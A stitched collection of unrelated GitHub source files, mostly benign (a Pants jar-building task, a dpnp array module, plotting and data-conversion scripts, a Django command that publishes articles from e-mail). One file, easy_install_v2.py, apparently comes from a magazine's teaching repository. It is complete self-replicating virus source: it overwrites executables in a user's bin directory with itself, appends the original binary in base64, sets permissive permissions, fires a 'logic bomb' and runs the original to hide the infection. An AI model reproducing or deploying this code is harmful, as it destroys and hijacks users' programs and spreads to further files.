    except jar.Error as e:
      raise TaskError('Failed to write to jar at %s: %s' % (path, e))
    with jar._render_jar_tool_args() as args:
      if args: # Don't build an empty jar
        args.append('-update=%s' % self._flag(not overwrite))
        args.append('-compress=%s' % self._flag(compressed))
        jar_rules = jar_rules or JarRules.default()
        args.append('-default_action=%s' % self._action_name(jar_rules.default_dup_action))
        skip_patterns = []
        duplicate_actions = []
        for rule in jar_rules.rules:
          if isinstance(rule, Skip):
            skip_patterns.append(rule.apply_pattern)
          elif isinstance(rule, Duplicate):
            duplicate_actions.append('%s=%s' % (rule.apply_pattern.pattern,
                                                self._action_name(rule.action)))
          else:
            raise ValueError('Unrecognized rule: %s' % rule)
        if skip_patterns:
          args.append('-skip=%s' % ','.join(p.pattern for p in skip_patterns))
        if duplicate_actions:
          args.append('-policies=%s' % ','.join(duplicate_actions))
        args.append(path)
        jvm_args = self.context.config.getlist('jar-tool', 'jvm_args', default=['-Xmx64M'])
        self.runjava(self.tool_classpath(self._JAR_TOOL_CLASSPATH_KEY),
                     'com.twitter.common.jar.tool.Main',
                     jvm_options=jvm_args,
                     args=args,
                     workunit_name='jar-tool',
                     workunit_labels=[WorkUnit.TOOL, WorkUnit.JVM, WorkUnit.NAILGUN])
  class JarBuilder(AbstractClass):
    """A utility to aid in adding the classes and resources associated with targets to a jar."""
    @staticmethod
    def _write_agent_manifest(agent, jar):
      # TODO(John Sirois): refactor an agent model to support 'Boot-Class-Path' properly.
      manifest = Manifest()
      manifest.addentry(Manifest.MANIFEST_VERSION, '1.0')
      if agent.premain:
        manifest.addentry('Premain-Class', agent.premain)
      if agent.agent_class:
        manifest.addentry('Agent-Class', agent.agent_class)
      if agent.can_redefine:
        manifest.addentry('Can-Redefine-Classes', 'true')
      if agent.can_retransform:
        manifest.addentry('Can-Retransform-Classes', 'true')
      if agent.can_set_native_method_prefix:
        manifest.addentry('Can-Set-Native-Method-Prefix', 'true')
      jar.writestr(Manifest.PATH, manifest.contents())
    @abstractproperty
    def _context(self):
      """Implementations must supply a context."""
    def add_target(self, jar, target, recursive=False):
      """Adds the classes and resources for a target to an open jar.
      :param jar: An open jar to add to.
      :param target: The target to add generated classes and resources for.
      :param bool recursive: `True` to add classes and resources for the target's transitive
        internal dependency closure.
      :returns: The list of targets that actually contributed classes or resources or both to the
        jar.
      """
      classes_by_target = self._context.products.get_data('classes_by_target')
      resources_by_target = self._context.products.get_data('resources_by_target')
      targets_added = []
      def add_to_jar(tgt):
        target_classes = classes_by_target.get(tgt)
        target_resources = []
        # TODO(pl): https://github.com/pantsbuild/pants/issues/206
        resource_products_on_target = resources_by_target.get(tgt)
        if resource_products_on_target:
          target_resources.append(resource_products_on_target)
        if tgt.has_resources:
          target_resources.extend(resources_by_target.get(r) for r in tgt.resources)
        if target_classes or target_resources:
          targets_added.append(tgt)
          def add_products(target_products):
            if target_products:
              for root, products in target_products.rel_paths():
                for prod in products:
                  jar.write(os.path.join(root, prod), prod)
          add_products(target_classes)
          for resources_target in target_resources:
            add_products(resources_target)
          if tgt.is_java_agent:
            self._write_agent_manifest(tgt, jar)
      if recursive:
        target.walk(add_to_jar)
      else:
        add_to_jar(target)
      return targets_added
  def prepare_jar_builder(self):
    """Prepares a ``JarTask.JarBuilder`` for use during ``execute``.
    This method should be called during task preparation to ensure the classes and resources needed
    for jarring targets are mapped by upstream tasks that generate these.
    """
    class PreparedJarBuilder(self.JarBuilder):
      @property
      # 'me' is used so the closure can still reach the task's own 'self'.
      def _context(me):
        return self.context
    return PreparedJarBuilder()
| fakeNetflix/square-repo-pants | src/python/pants/backend/jvm/tasks/jar_task.py | jar_task.py | py | 12,978 | python | en | code | 0 | github-code | 36 |
13348205900 | import dpnp.config as config
# from dpnp.dparray import dparray
from dpnp.dpnp_array import dpnp_array
import numpy
import dpctl.tensor as dpt
# Verify DPCtl is importable before using it as the output data container;
# clear the flag so the rest of dpnp falls back when it is not installed.
if config.__DPNP_OUTPUT_DPCTL__:
    try:
        """
        Detect DPCtl availability to use data container
        """
        import dpctl.tensor as dpctl
    except ImportError:
        """
        No DPCtl data container available
        """
        config.__DPNP_OUTPUT_DPCTL__ = 0
# Public API of this container module.
__all__ = [
    "asarray",
    "empty",
]
def asarray(x1,
            dtype=None,
            copy=False,
            order="C",
            device=None,
            usm_type=None,
            sycl_queue=None):
    """Convert `x1` into a `dpnp_array`.

    A `dpnp_array` input is unwrapped to its underlying USM array first;
    anything else is handed to `dpctl.tensor.asarray` as-is.
    """
    source = x1.get_array() if isinstance(x1, dpnp_array) else x1
    usm_res = dpt.asarray(source,
                          dtype=dtype,
                          copy=copy,
                          order=order,
                          device=device,
                          usm_type=usm_type,
                          sycl_queue=sycl_queue)
    return dpnp_array(usm_res.shape, buffer=usm_res, order=order)
def empty(shape,
          dtype="f8",
          order="C",
          device=None,
          usm_type="device",
          sycl_queue=None):
    """Create a `dpnp_array` backed by an uninitialized USM allocation."""
    usm_res = dpt.empty(shape,
                        dtype=dtype,
                        order=order,
                        device=device,
                        usm_type=usm_type,
                        sycl_queue=sycl_queue)
    return dpnp_array(usm_res.shape, buffer=usm_res, order=order)
| LukichevaPolina/dpnp | dpnp/dpnp_container.py | dpnp_container.py | py | 1,686 | python | en | code | null | github-code | 36 |
7424080764 | from plot_cryptosystems import plot_cryptosystems_single_dim, sns
from cryptosystems import SIGN_DF, max_abs_scaler, np
import matplotlib
# Bar plot of the bytes-per-cycle ratio for level-3 signature schemes.
df = SIGN_DF
p = sns.color_palette("Paired")
sns.set(context='paper', palette=sns.color_palette("Paired"))
sns.set_style(sns.axes_style("ticks"),
              {'axes.grid': True})
# Only NIST security level 3 schemes are plotted.
df = df[df['Level'] == 3]
# NOTE(review): the squaring and the final division cancel out, so this is
# the plain ratio (or -1/ratio when ratio < 1) — confirm the intended metric.
df['test'] = np.where(df['ratio_data_to_cycles']<1, -1, df['ratio_data_to_cycles']**2)/df['ratio_data_to_cycles']
df= df.reset_index(drop=True)
#df = df.sort_values(['Algorithm','Total Cost'])
import matplotlib.pyplot as plt
g=sns.barplot(data=df, x='Cipher', y='test',color=p[0])
for item in g.get_xticklabels():
    item.set_rotation(90)
#g.set_yscale("log")
g.set(xlabel='', ylabel='Bytes/Cycles')
#plt.show()
#plt.savefig('loes20/Dokumentation/Latex/Bilder/plot_bar_ratio_comp_sign.pdf')
| crest42/ma | loes20/Dokumentation/src/plot_bar_ratio_cycles_bytes_signature.py | plot_bar_ratio_cycles_bytes_signature.py | py | 840 | python | en | code | 0 | github-code | 36 |
22209534047 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import logging
from subprocess import Popen
from os import devnull
try:
from functools import reduce
except:
pass
def get_time_info(state):
    """Split a "name#begin-end" state string into [name, begin, end, duration].

    When there is no "#" marker the time fields all default to 0.0.
    """
    if "#" not in state:
        return [state, 0.0, 0.0, 0.0]
    name, span = state.split("#")
    start_text, stop_text = span.split("-")
    start = float(start_text)
    stop = float(stop_text)
    return [name, start, stop, stop - start]
def stripmac(state, mac):
    """Drop the MAC-address prefix (and any "playlist" token) from a reply line.

    Logs an error and returns the line untouched when *mac* is absent.
    """
    if mac not in state:
        logging.error("MAC address not in telnet comm: %s", state)
        return state
    cleaned = state.replace(mac, "").strip()
    if "playlist" in cleaned:
        cleaned = cleaned.replace("playlist", "").strip()
    return cleaned
def check_required():
    """Verify the external audio tools this program shells out to are installed.

    Runs `which` for each required binary; logs a critical message and
    returns False on the first missing one, True when all are present.
    """
    # The with-block fixes the previous implementation's leaked devnull
    # handle (it was never closed, including on the early returns).
    with open(devnull, "w") as nulfp:
        for tool in ['sox', 'flac', 'lame', 'play', 'amixer']:
            check = Popen(['which', tool], stdout=nulfp.fileno(), stderr=nulfp.fileno()).wait()
            if check != 0:
                logging.critical("Necessary %s program not found on your system", tool)
                return False
    return True
def flac_time(t):
    """Format *t* seconds as the mm:ss.mmm string flac expects."""
    # Same millisecond arithmetic as the classic reduce/divmod one-liner,
    # spelled out explicitly.
    remainder, millis = divmod(t * 1000, 1000)
    minutes, seconds = divmod(remainder, 60)
    return "%02d:%02d.%03d" % (minutes, seconds, millis)
def sox_time(t):
    """Format *t* seconds as the hh:mm:ss.mmm string sox expects."""
    remainder, millis = divmod(t * 1000, 1000)
    remainder, seconds = divmod(remainder, 60)
    hours, minutes = divmod(remainder, 60)
    return "%02d:%02d:%02d.%03d" % (hours, minutes, seconds, millis)
| terual/sbcc | module/functions.py | functions.py | py | 2,415 | python | en | code | 2 | github-code | 36 |
27049180203 | from datetime import datetime
from django.core.management.base import BaseCommand
from django.utils.timezone import now
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.utils.translation import gettext as _
from imap_tools import MailBox, AND
from filebrowser.base import FileObject
from blog.models import Article
from pages.models import GalleryImage
from users.models import User
def process_message(message, usr):
    """Turn one IMAP message into a published Article plus gallery images.

    The mail body must contain bracketed fields in this order:
    TITLE[..] DESCRIPTION[..] TEXT[..] DATE[..] CATEGORIES[..] NOTICE[..]
    (markers are localised via gettext).  Attachments are expected to be
    named ``<position>-<caption>.<ext>``.

    :param message: imap_tools message (``.text``, ``.attachments``).
    :param usr: User recorded as the article's author.
    """
    msg = message.text
    # field name -> localised marker; consumed in insertion order.
    d = {'title': _('TITLE['), 'intro': _('DESCRIPTION['),
         'body': _('TEXT['), 'date': _('DATE['),
         'tags': _('CATEGORIES['), 'notice': _('NOTICE[')}
    for key, value in d.items():
        msg = msg.replace(value, '')
        # Everything up to the closing bracket is the field's value.
        d[key] = msg.split(']', 1)[0].replace('\r\n', '')
        msg = msg.split(']', 1)[1]
    try:
        d['date'] = datetime.strptime(d['date'], '%d/%m/%y')
    except:
        # Unparseable (or missing) date: publish now.
        d['date'] = now()
    post = Article(title=d['title'], intro=d['intro'], body=d['body'],
                   date=d['date'], tags=d['tags'], author=usr, notice=d['notice'] )
    try:
        post.save()
    except:
        # NOTE(review): bare except silently drops the mail on any save
        # failure (validation, DB outage) -- consider logging here.
        return
    for att in message.attachments: # list: [Attachment objects]
        file = SimpleUploadedFile(att.filename, att.payload,
                                  att.content_type)
        # Filename convention: "<position>-<caption>.<ext>".
        position = att.filename.split('-', 1)[0]
        caption = att.filename.split('-', 1)[1]
        caption = caption.rsplit('.', 1)[0]
        instance = GalleryImage(post_id=post.uuid, image=file,
                                position=position, caption=caption)
        #save the instance and upload the file
        instance.save()
        #update the filebrowse field
        instance.fb_image = FileObject(str(instance.image))
        instance.save()
def do_command():
    """Poll the IMAP inbox and publish every unseen 'articles' e-mail.

    No-op unless settings.FETCH_EMAILS is enabled.  A message is only
    processed when its sender matches a known User holding the
    blog.add_article permission; everything else is skipped (but still
    marked seen by the fetch below).
    """
    if not settings.FETCH_EMAILS:
        return
    HOST = settings.IMAP_HOST
    USER = settings.IMAP_USER
    PASSWORD = settings.IMAP_PWD
    # NOTE(review): PORT and FROM are assigned but never used below.
    PORT = settings.IMAP_PORT
    FROM = settings.IMAP_FROM
    with MailBox(HOST).login(USER, PASSWORD, 'INBOX') as mailbox:
        # mark_seen=True: fetched mails won't be picked up again next run.
        for message in mailbox.fetch(AND(seen=False, subject=_('articles'), ),
                                     mark_seen=True):
            try:
                usr = User.objects.get(email=message.from_)
                if not usr.has_perm('blog.add_article'):
                    continue
            except:
                # Sender has no account: ignore the mail.
                continue
            process_message(message, usr)
class Command(BaseCommand):
    """Management command: fetch unread article e-mails and publish them."""
    def handle(self, *args, **options):
        # Delegate to the module-level helper (eases reuse from cron/tests).
        do_command()
| andywar65/project_repo | blog/management/commands/fetch_article_emails.py | fetch_article_emails.py | py | 2,479 | python | en | code | 2 | github-code | 36 |
2063174381 | # -*- coding: utf-8 -*-
"""
@title: test_convert_spectra.py
@description: Example Python script to test the spectra data converter and to test reloading the converted spectra data
@author: chrisarcadia
@created: 2018/10/26
"""
import Bruker
import matplotlib.pyplot as pyplot
import h5py
import numpy
# Convert a data file.  `converted` records whether conversion ran or
# was skipped (e.g. because the output file already exists).
input_filename = r'C:\Users\ChrisTow\Desktop\Examples\single\Mix_1_100_1.d'
output_filename = r'C:\Users\ChrisTow\Desktop\Converted\single\Mix_1_100_1.hdf5'
try:
    settings = Bruker.get_measurement_settings(input_filename)
    positions = settings['positions']
    Bruker.convert_settings(output_filename, settings)
    Bruker.convert_data_spectra(input_filename, output_filename, settings)
    converted = 1
except Exception:
    # Narrowed from a bare `except:` so Ctrl-C / SystemExit still work.
    converted = 0  # conversion skipped (e.g. the file already exists)
# Load the converted data; the context manager guarantees the HDF5
# handle is closed even if one of the reads below raises.
index = 0
with h5py.File(output_filename, 'r') as hf:
    spec = hf.get('spectra/')
    mz = numpy.array(spec['mass_to_charge'][index, :])
    signal = numpy.array(spec['signal'][index, :])
    info = {}
    for k in spec.attrs.keys():
        info.update({k: spec.attrs[k]})
print('Data Info:')
print(info)
# Plot one of the spectra
pyplot.plot(mz, signal, 'bo', markersize=1)
pyplot.ylabel('Signal')
pyplot.xlabel('M/Z')
pyplot.grid(True)
pyplot.show()
| scale-lab/AcidBaseNetworks | simulations/chemcpupy/automation/Bruker/test_convert_spectra.py | test_convert_spectra.py | py | 1,382 | python | en | code | 0 | github-code | 36 |
72084597543 | from setuptools import setup, find_packages
# Collect runtime dependencies, skipping VCS (git+...) requirement
# lines, which pip cannot resolve through install_requires.
with open("requirements.txt") as req_file:
    requirements = [line.strip() for line in req_file if "git+" not in line]
setup(
    name='chord-cleaning',
    description='creating a set of standardized chords from data',
    install_requires=requirements,
    packages=find_packages(),
)
| emilycardwell/chord-cleaning | setup.py | setup.py | py | 341 | python | en | code | 0 | github-code | 36 |
4000738437 | import argparse
import math
from pathlib import Path
import random
import sys
import numpy as np
import pandas as pd
TRAIN_POOL_FILEPATH = "../../outputs/data_generation/train_pool.tsv"
TRAIN_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/train.tsv"
TO_PREDICT_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/to_predict.tsv"
PREDICTED_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/predicted.tsv"
STRATIFIED_LOG_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/stratified_log.txt"
STRATIFIED_NUM_BINS = 10
SAMPLING_STRATEGIES = [
"certain_pos",
"uncertain",
"stratified",
"random",
]
def parse_argument() -> argparse.Namespace:
    """Parse the command-line arguments for one active-learning round.

    Required: --sampling_strategy, --run, --round, --total_rounds.
    Optional: --random_state (reproducibility), --train_pool_filepath.
    """
    parser = argparse.ArgumentParser(description="Generate the first version of annotation.")
    parser.add_argument(
        "--random_state",
        type=int,
        help="Set random state.",
    )
    parser.add_argument(
        "--sampling_strategy",
        type=str,
        required=True,
        help="Sampling strategy to use (stratified|certain_pos|uncertain).",
    )
    parser.add_argument(
        "--run",
        type=int,
        required=True,
        help="Specify which run this is for.",
    )
    parser.add_argument(
        "--round",
        type=int,
        required=True,
        help="Current round.",
    )
    parser.add_argument(
        "--total_rounds",
        type=int,
        required=True,
        help="Total number of rounds.",
    )
    parser.add_argument(
        "--train_pool_filepath",
        type=str,
        default=TRAIN_POOL_FILEPATH,
        help=f"Training pool filepath. (Default: {TRAIN_POOL_FILEPATH})",
    )
    args = parser.parse_args()
    return args
def _drop_duplicates():
    # TODO: unimplemented placeholder -- never called in this module.
    pass
def main():
    """Build round-``args.round`` train / to-predict splits for one run.

    Round 1 slices the shuffled pool; later rounds pick
    ``num_train_per_round`` rows from the previous round's predictions
    according to the chosen sampling strategy and append them to the
    previous round's training set.
    """
    args = parse_argument()
    if args.sampling_strategy not in SAMPLING_STRATEGIES:
        # NOTE(review): 'startegy' typo is in the user-visible message.
        raise ValueError(f"Invalid sampling startegy: {args.sampling_strategy}")
    print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} START *****")
    if args.random_state:
        random.seed(args.random_state)
    df_train_pool = pd.read_csv(args.train_pool_filepath, sep='\t')
    # Shuffle once so the round-1 slice is random but reproducible.
    df_train_pool = df_train_pool.sample(frac=1, random_state=args.random_state)
    print(f"Train pool shape: {df_train_pool.shape[0]}")
    num_train_per_round = math.ceil(df_train_pool.shape[0] / args.total_rounds)
    print(f"Number of training data per round: {num_train_per_round}")
    train_filepath = TRAIN_FILEPATH_FS.format(
        args.sampling_strategy, args.run, args.round)
    to_predict_filepath = TO_PREDICT_FILEPATH_FS.format(
        args.sampling_strategy, args.run, args.round)
    Path(train_filepath).parent.mkdir(parents=True, exist_ok=True)
    Path(to_predict_filepath).parent.mkdir(parents=True, exist_ok=True)
    # Round 1: no predictions exist yet -- just slice the shuffled pool.
    if args.round == 1:
        df_train = df_train_pool[:num_train_per_round]
        df_to_predict = df_train_pool[num_train_per_round:]
        print(f"Training data shape: {df_train.shape[0]}")
        print(f"To predict data shape: {df_to_predict.shape[0]}")
        print(f"Saving training data to '{train_filepath}'")
        df_train.to_csv(train_filepath, sep='\t', index=False)
        print(f"Saving to_predict data to '{to_predict_filepath}'")
        df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
    else:
        # Later rounds: select new rows from last round's predictions.
        predicted_filepath = PREDICTED_FILEPATH_FS.format(
            args.sampling_strategy, args.run, args.round-1)
        df_predicted = pd.read_csv(predicted_filepath, sep='\t', keep_default_na=False)
        df_predicted.sort_values("prob", ascending=False, inplace=True)
        print(f"Predicted '{predicted_filepath}' size: {df_predicted.shape[0]}")
        prev_train_filepath = TRAIN_FILEPATH_FS.format(
            args.sampling_strategy, args.run, args.round-1)
        df_train = pd.read_csv(prev_train_filepath, sep='\t', keep_default_na=False)
        print(f"Previous training data '{prev_train_filepath}' size: {df_train.shape[0]}")
        if args.sampling_strategy == "certain_pos":
            # Highest-probability rows first (sorted descending above).
            df_train_new = df_predicted[:num_train_per_round].copy()
            df_to_predict = df_predicted[num_train_per_round:].copy()
        elif args.sampling_strategy == "uncertain":
            # min(1-p, p) peaks at p == 0.5, i.e. maximal uncertainty.
            df_predicted["uncertainty"] = df_predicted["prob"].apply(lambda x: np.min([1-x, x]))
            df_predicted.sort_values("uncertainty", ascending=False, inplace=True)
            df_train_new = df_predicted[:num_train_per_round].copy()
            df_to_predict = df_predicted[num_train_per_round:].copy()
            df_train_new.drop("uncertainty", axis=1, inplace=True)
            df_to_predict.drop("uncertainty", axis=1, inplace=True)
        elif args.sampling_strategy == "stratified":
            stratified_log_filepath = STRATIFIED_LOG_FILEPATH_FS.format(
                args.sampling_strategy, args.run, args.round)
            Path(stratified_log_filepath).parent.mkdir(parents=True, exist_ok=True)
            Path(stratified_log_filepath).unlink(missing_ok=True)
            # Try 10 probability bins first; shrink the bin count until
            # every bin can supply enough training rows.
            for num_linspace in range(11, 1, -1):
                print(f"Number of prob bins testing: {num_linspace-1}")
                num_train_per_bin = math.floor(num_train_per_round / (num_linspace-1))
                num_train_final_bin = num_train_per_round - num_train_per_bin*(num_linspace-2)
                print(f"num_train_per_bin: {num_train_per_bin}")
                df_predicted_copy = df_predicted.copy()
                df_predicted_copy["prob_bin"] = pd.cut(
                    df_predicted_copy["prob"],
                    bins=np.linspace(0, 1, num_linspace),
                    include_lowest=True,
                )
                df_grouped_size = df_predicted_copy.groupby("prob_bin").size()
                print("Predicted grouped by prob bin:\n", df_grouped_size)
                with open(stratified_log_filepath, 'a') as _f:
                    _f.write(f"num_bins: {num_linspace-1}\n")
                    _f.write(f"num_train_per_bin: {num_train_per_bin}\n")
                    _f.write(f"num_train_final_bin: {num_train_final_bin}\n")
                    _f.write("Predicted grouped by prob bin:\n")
                    _f.write(str(df_grouped_size)+'\n\n')
                if num_train_final_bin > min(df_grouped_size.tolist()):
                    print("Not enough training data per bin. Reducing the prob bin...")
                    continue
                else:
                    print("Enough training data")
                    train_new_data = []
                    to_predict_data = []
                    cur_bin = 1
                    df_grouped = df_predicted_copy.groupby("prob_bin")
                    for group, df_subset in df_grouped:
                        df_subset = df_subset.sample(frac=1, random_state=args.random_state)
                        # Last bin absorbs the rounding remainder.
                        n = num_train_per_bin if cur_bin < (num_linspace-1) else num_train_final_bin
                        train_new_data.append(df_subset[:n])
                        to_predict_data.append(df_subset[n:])
                        cur_bin += 1
                    df_train_new = pd.concat(train_new_data).drop("prob_bin", axis=1)
                    df_to_predict = pd.concat(to_predict_data).drop("prob_bin", axis=1)
                    break
        elif args.sampling_strategy == "random":
            df_predicted_shuffled = df_predicted.sample(frac=1, random_state=args.random_state)
            df_train_new = df_predicted_shuffled[:num_train_per_round].copy()
            df_to_predict = df_predicted_shuffled[num_train_per_round:].copy()
        # NOTE(review): df_train_new / df_to_predict are unbound here if
        # the stratified loop above never breaks -- that raises NameError.
        train_new_filepath = train_filepath.replace('.tsv', '_new.tsv')
        print(f"Saving training data new to this round to '{train_new_filepath}'")
        df_train_new.to_csv(train_new_filepath, sep='\t', index=False)
        df_train_new.drop("prob", axis=1, inplace=True)
        df_train = pd.concat([df_train, df_train_new])
        df_to_predict.drop("prob", axis=1, inplace=True)
        print(f"Saving training data to '{train_filepath}'")
        df_train.to_csv(train_filepath, sep='\t', index=False)
        print(f"Saving to_predict data to '{to_predict_filepath}'")
        df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
    print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} END *****")
if __name__ == '__main__':
main()
| IBPA/SemiAutomatedFoodKBC | src/data_generation/prepare_training_data.py | prepare_training_data.py | py | 8,371 | python | en | code | 1 | github-code | 36 |
31724432420 | # Предложение with служит для упрощения конструкции try/finally
# Вначале блока with вызывается метод __enter__
# Роль части finally играет обращение к методу __exit__
from unittest.mock import patch
class LookingGlass:
    """Context manager that mirrors every string written to stdout.

    Entering patches ``sys.stdout.write`` and hands back 'JABBERWOCKY';
    exiting restores the real writer and suppresses ZeroDivisionError
    after printing a warning.
    """
    def __enter__(self):
        import sys
        # Remember the genuine writer so it can be restored on exit.
        self.original_write = sys.stdout.write
        sys.stdout.write = self.reverse_write
        return 'JABBERWOCKY'
    def reverse_write(self, text):
        # Forward the mirrored text through the saved writer.
        self.original_write(text[::-1])
    def __exit__(self, exc_type, exc_value, traceback):
        import sys
        sys.stdout.write = self.original_write
        if exc_type is not ZeroDivisionError:
            return None
        print('Пожалуйста, не надо делить на нуль!')
        return True
# Demo: inside the block stdout is mirrored; the ZeroDivisionError is
# swallowed by LookingGlass.__exit__, so execution continues below.
with LookingGlass() as what:
    print('Alice, Kitty and Snowdrop')
    print(what)
    raise ZeroDivisionError
# Outside the block stdout is restored, so these print normally.
print(what)
print('Alice, Kitty and Snowdrop')
| GrigorevEv/grade_2 | python/context_manager/handwritten.py | handwritten.py | py | 997 | python | ru | code | 0 | github-code | 36 |
25167990666 | """
Assignment: Programming Project 4: Client / Server Chat
File: Configuration
Description: Configuration file for both server and client scripts.
A list of constants.
Dependencies: None
Course: CS 372
Section: 400
Module: 10
Name: Marcos Valdez
ONID: valdemar
Due: 12/04/2022
Modified: 12/03/2022
"""
import random
HOST = "127.0.0.1" # Standard loopback interface address (localhost)
PORT = 55085 # Port to listen on (non-privileged ports are > 1023)
# Picked once at import time from the 57344-65535 range, so every run
# of the client binds a different port.
CLIENT = random.randint(57344, 65535) # Client port
BUFFER = 4096 # Socket .recv buffer size (bytes)
MIN_RESP = 18 # Response size lower limit to close socket
| MHValdez/Socket_Server_and_Client_Chat | config.py | config.py | py | 853 | python | en | code | 0 | github-code | 36 |
13329932727 | import json
from channels.generic.websocket import WebsocketConsumer
from django.contrib.auth.models import User
from gestion_admin.models import Article, Historique
class ChatConsumer(WebsocketConsumer):
    """Synchronous websocket consumer backing the chatbot page.

    The URL route carries an article id in the ``room`` kwarg.
    """
    def connect(self):
        # NOTE(review): User.objects.get raises for unknown usernames,
        # which aborts the handshake -- confirm that is intended for
        # anonymous visitors.
        self.user = User.objects.get(username=self.scope["user"])
        self.historique = Historique.objects.filter(user=self.user)
        self.article = Article.objects.get(id=self.scope['url_route']['kwargs']['room'])
        print(self.user, self.article)
        # Last history entry for this user (count()-1 issues an extra
        # COUNT query; queryset .last() would be cheaper).
        self.last_history = self.historique[self.historique.count()-1]
        self.last_article = self.last_history.article
        self.id = self.last_article.id
        self.title = self.last_article.title
        self.categorie = self.last_article.categorie
        # The article body lives in a file field; decoded as UTF-8 here.
        self.text = self.last_article.file.read().decode('utf-8')
        print(self.last_history, self.last_article)
        print(self.text)
        self.accept()
    def disconnect(self, close_code):
        self.close()
    def receive(self, text_data):
        # NOTE(review): when the message matches neither branch below,
        # `reponse` stays None and is sent to the client as JSON null.
        reponse = None
        text_data_json = json.loads(text_data)
        message = text_data_json['message']
        print(message)
        if 'hello' in message:
            reponse = {
                'type' : 'text',
                'text' : "Hello I'am ChatBot!"
            }
        elif 'hi' in message:
            # 'hello' is tested first, so a bare "hi" lands here.
            reponse= {
                'type' : 'link',
                'article' : 1,
                'text' : 'hello'
            }
self.send(text_data=json.dumps(reponse)) | meryem1994/chatbot-project | user/consumers.py | consumers.py | py | 1,526 | python | en | code | 0 | github-code | 36 |
12062872784 | def divisors(num, primes):
if num == 1:
return 1
elif num == 2: return 2
else:
divisors = 2
divlist = [1, num]
for divisor in primes:
if divisor ** 2 <= num:
if num % divisor == 0:
if divisor ** 2 == num:
divisors += 1
divlist.append(divisor)
else:
multiple = 0
while True:
multiple += divisor
if multiple ** 2 > num: break
if multiple ** 2 == num and multiple not in divlist:
divisors += 1
divlist.append(multiple)
elif num % multiple == 0 and multiple not in divlist:
divisors += 2
divlist.append(multiple)
divlist.append(num // multiple)
else: break
return divisors
def sieve(n, existing=None):
    """Return the primes up to ``n`` (inclusive) by trial division.

    :param n: upper bound for the primes.
    :param existing: optional non-empty list of already-known primes to
        extend in place.  The default is now ``None`` instead of the
        classic mutable-default pitfall ``existing=[]``.
    :return: list of primes starting at 2 (quirk kept from the original:
        2 is returned even when ``n < 2``).
    """
    # Start from [2] unless the caller supplied a non-empty seed list,
    # which (as before) is extended and returned in place.
    result = existing if existing else [2]
    divisor = 3
    while divisor <= n:
        # divisor is prime iff no already-found prime divides it.
        if all(divisor % prime != 0 for prime in result):
            result.append(divisor)
        divisor += 2
    return result
# Project Euler 12: find the first triangle number with more than 500
# divisors.  `triangle` always holds the i-th triangle number.
i = 1
triangle = 1
# NOTE(review): only primes up to 1000 are sieved; divisors() counts
# factors from them and their multiples -- confirm this bound suffices
# for the final answer.
primes = sieve(1000)
while divisors(triangle, primes) <= 500:
    i += 1
    triangle += i
print (triangle) | rgertenbach/Project-Euler-Python | Euler 12.py | Euler 12.py | py | 1,477 | python | en | code | 0 | github-code | 36 |
75118097702 | #!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contient le code binaire du programme
ftcLines = b''.join(ftcLines)
# On détermine où se trouve le code exécutable original
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contient le virus
# original contient le code binaire original
# On efface l'exécutable, on écrit le code Python et on colle le code binaire
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Bombe logique
bomb()
# Exécution du code original
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
| GLMF/GLMF201 | Libs_et_Modules/easy_install_v2.py | easy_install_v2.py | py | 2,566 | python | en | code | 2 | github-code | 36 |
32365954378 | import json, random
from random import shuffle
from itertools import islice
# Append the first 12307 lines of bad.json onto _12bad.json.  Context
# managers replace the original leaked handles: `out` was never closed
# (risking lost buffered output) and the input file relied on GC.
with open("bad.json") as src, open("_12bad.json", "a") as out:
    # islice streams the prefix instead of materialising every line.
    for line in islice(src, 12307):
        out.write(line)
| masteroppgave/topic_model | filter.py | filter.py | py | 196 | python | en | code | 0 | github-code | 36 |
